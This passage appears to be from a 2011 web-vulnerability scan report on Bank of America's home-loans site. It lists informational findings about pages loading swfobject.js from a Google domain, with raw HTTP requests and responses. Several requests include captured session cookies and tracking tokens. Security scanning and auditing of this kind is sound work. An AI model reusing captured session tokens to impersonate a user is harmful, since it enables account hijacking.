<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

   <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d684383/2/685277/randm.js"></script>
   
   <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d684383/3/685278/randm.js"></script>
...[SNIP]...

10.3. http://homeloans.bankofamerica.com/en/community-support.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/community-support.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/community-support.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:47 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:47 GMT
Last-Modified: Thu, 06 Oct 2011 05:50:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 11435
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.4. http://homeloans.bankofamerica.com/en/home-loan-experience.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-experience.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-experience.html HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://homeloans.bankofamerica.com/en/home.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; cmRS=&t1=1317908551715&t2=1317908567194&t3=1317908613572&lti=1317908613572&ln=NavHomeLoanGuide&hr=http%3A//homeloans.bankofamerica.com/en/home-loan-experience.html&fti=&fn=&ac=&fd=&uer=&fu=&pi=MHEI%3AMKT%3Amortgage%3ACD1en%3BHome&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:43:01 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:13:01 GMT
Last-Modified: Wed, 05 Oct 2011 20:20:01 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 14100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.5. http://homeloans.bankofamerica.com/en/home-loan-options.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options.html HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://homeloans.bankofamerica.com/en/home-loan-experience.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; NSC_CbolPgBnfsjdb=445b32097852; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; throttle_value=72; JSESSIONID=E6A0FC7818B5A463BA24F78BE655EBEE; cmRS=&t1=1317908617284&t2=1317908623919&t3=1317908903453&t4=1317908615946&lti=1317908903452&ln=NavHomeLoanOptions&hr=http%3A//homeloans.bankofamerica.com/en/home-loan-options.html&fti=&fn=&ac=&fd=&uer=&fu=&pi=MHEI%3AMKT%3Amortgage%3ACD1en%3BHomeLoanGuide&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:48:47 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:18:47 GMT
Last-Modified: Wed, 05 Oct 2011 20:36:58 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="home loans, home loan options" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.6. http://homeloans.bankofamerica.com/en/home-loan-options/borrow/cash-out-refinancing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/borrow/cash-out-refinancing.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/borrow/cash-out-refinancing.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:56 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:56 GMT
Last-Modified: Wed, 05 Oct 2011 23:00:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17987
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.7. http://homeloans.bankofamerica.com/en/home-loan-options/borrow/home-equity-line-of-credit.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/borrow/home-equity-line-of-credit.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/borrow/home-equity-line-of-credit.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:57 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:57 GMT
Last-Modified: Thu, 08 Sep 2011 17:33:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 20800
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="HELOC, home equity line of credit" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.8. http://homeloans.bankofamerica.com/en/home-loan-options/borrow/home-equity-loan.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/borrow/home-equity-loan.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/borrow/home-equity-loan.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:57 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:57 GMT
Last-Modified: Wed, 05 Oct 2011 20:23:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19051
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="home equity loan, home equity loans" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.9. http://homeloans.bankofamerica.com/en/home-loan-options/buy/15-year-fixed-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/buy/15-year-fixed-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/buy/15-year-fixed-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:51 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:51 GMT
Last-Modified: Thu, 08 Sep 2011 16:18:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17889
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="15 year fixed rate, 15 year fixed rate mortgage" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.10. http://homeloans.bankofamerica.com/en/home-loan-options/buy/30-year-fixed-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/buy/30-year-fixed-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/buy/30-year-fixed-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:50 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:50 GMT
Last-Modified: Thu, 08 Sep 2011 16:15:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17743
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="30 year fixed rate, 30 year fixed rate mortgage" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.11. http://homeloans.bankofamerica.com/en/home-loan-options/buy/5-1-adjustable-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/buy/5-1-adjustable-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/buy/5-1-adjustable-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:51 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:51 GMT
Last-Modified: Wed, 05 Oct 2011 23:05:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 18962
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.12. http://homeloans.bankofamerica.com/en/home-loan-options/other-options/additional-loans-and-programs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/other-options/additional-loans-and-programs.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/other-options/additional-loans-and-programs.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:58 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:58 GMT
Last-Modified: Thu, 08 Sep 2011 17:00:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17630
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="fha loans, fha loan, va loans, va home loans" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.13. http://homeloans.bankofamerica.com/en/home-loan-options/refinance/15-year-fixed-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/refinance/15-year-fixed-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/refinance/15-year-fixed-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:54 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:54 GMT
Last-Modified: Thu, 06 Oct 2011 00:09:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17948
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="NOINDEX, NOFOLLOW" name="ROBOTS"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.14. http://homeloans.bankofamerica.com/en/home-loan-options/refinance/30-year-fixed-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/refinance/30-year-fixed-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/refinance/30-year-fixed-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:53 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:53 GMT
Last-Modified: Thu, 08 Sep 2011 19:13:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17995
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="NOINDEX, NOFOLLOW" name="ROBOTS"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.15. http://homeloans.bankofamerica.com/en/home-loan-options/refinance/5-1-adjustable-rate-mortgage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/refinance/5-1-adjustable-rate-mortgage.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/refinance/5-1-adjustable-rate-mortgage.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:54 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:54 GMT
Last-Modified: Thu, 08 Sep 2011 19:13:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19062
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="NOINDEX, NOFOLLOW" name="ROBOTS"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.16. http://homeloans.bankofamerica.com/en/home-loan-options/refinance/cash-out-refinancing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home-loan-options/refinance/cash-out-refinancing.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home-loan-options/refinance/cash-out-refinancing.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:55 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:55 GMT
Last-Modified: Thu, 08 Sep 2011 19:28:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 18470
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="cash out refinance, cash out refinancing, refinance with cash out, cash out refinance mortgage" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.17. http://homeloans.bankofamerica.com/en/home.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home.html HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; NSC_CbolPgBnfsjdb=445b32097852; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:53 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:11:53 GMT
Last-Modified: Thu, 08 Sep 2011 15:41:07 GMT
Vary: Accept-Encoding
